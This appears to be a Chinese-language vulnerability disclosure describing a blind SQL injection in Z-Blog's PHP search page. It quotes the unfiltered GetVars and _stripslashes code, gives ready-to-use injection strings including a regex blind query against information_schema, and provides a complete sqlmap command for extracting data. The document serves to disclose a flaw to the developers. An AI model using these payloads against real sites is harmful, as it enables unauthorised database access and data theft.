Z-Blog的php版前台正则SQL盲注漏洞

### 简要描述： 第二发...另外有点疑惑想问下你们的开发 ### 详细说明： 问题出在 /zb_system/function/c_system_common.php ``` function GetVars($name,$type='REQUEST'){ if ($type=='ENV') {$array=&$_ENV;} if ($type=='GET') {$array=&$_GET;} if ($type=='POST') {$array=&$_POST;} if ($type=='COOKIE') {$array=&$_COOKIE;} if ($type=='REQUEST') {$array=&$_REQUEST;} if ($type=='SERVER') {$array=&$_SERVER;} if ($type=='SESSION') {$array=&$_SESSION;} if ($type=='FILES') {$array=&$_FILES;} if(isset($array[$name])){ var_dump($array[$name]); return $array[$name]; }else{ return null; } } ``` GET过来的数据木有经过过滤就进入dbsql.php里面查询 在前台的搜索框里输入注入语句,h为可搜索到的字符 h%') and 1)# [<img src="https://images.seebug.org/upload/201309/24114346b4796e74569456ade3719137ec351b74.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/24114346b4796e74569456ade3719137ec351b74.jpg) and 1可以替换成SQL注入，这里使用正则盲注 h%')and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="zblog" AND table_name REGEXP '^[a-z]' LIMIT 0,1))# [<img src="https://images.seebug.org/upload/201309/241148287790c815773c56bfc9fd175507dd6fdc.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/241148287790c815773c56bfc9fd175507dd6fdc.jpg) 一个个字符把数据读出来.. 手注太蛋疼 使用sqlmap ``` python sqlmap.py -u 网站地址/search.php?q=能成功搜索到的字符 -p 能成功搜索到的字符 --prefix "%')" --suffix ")#" ``` [<img src="https://images.seebug.org/upload/201309/241156400e212453811287b9ad15fd52607999db.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/241156400e212453811287b9ad15fd52607999db.jpg) [<img src="https://images.seebug.org/upload/201309/2411540670e9c9bd342f6d2f8e67bebc4547fc9e.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/2411540670e9c9bd342f6d2f8e67bebc4547fc9e.jpg) 我想弱弱问一句 为啥要把\'转换回来.求注入的节奏？ zblog/zb_system/function/c_system_base.php ``` function _stripslashes(&$val) { if(!is_array($val)) return stripslashes($val); foreach($val as $k => &$v) $val[$k] = _stripslashes($v); return $val; } if(get_magic_quotes_gpc()){ _stripslashes($_GET); _stripslashes($_POST); _stripslashes($_COOKIE); } ``` ### 漏洞证明： [<img src="https://images.seebug.org/upload/201309/241156400e212453811287b9ad15fd52607999db.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/241156400e212453811287b9ad15fd52607999db.jpg) [<img src="https://images.seebug.org/upload/201309/2411540670e9c9bd342f6d2f8e67bebc4547fc9e.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/2411540670e9c9bd342f6d2f8e67bebc4547fc9e.jpg)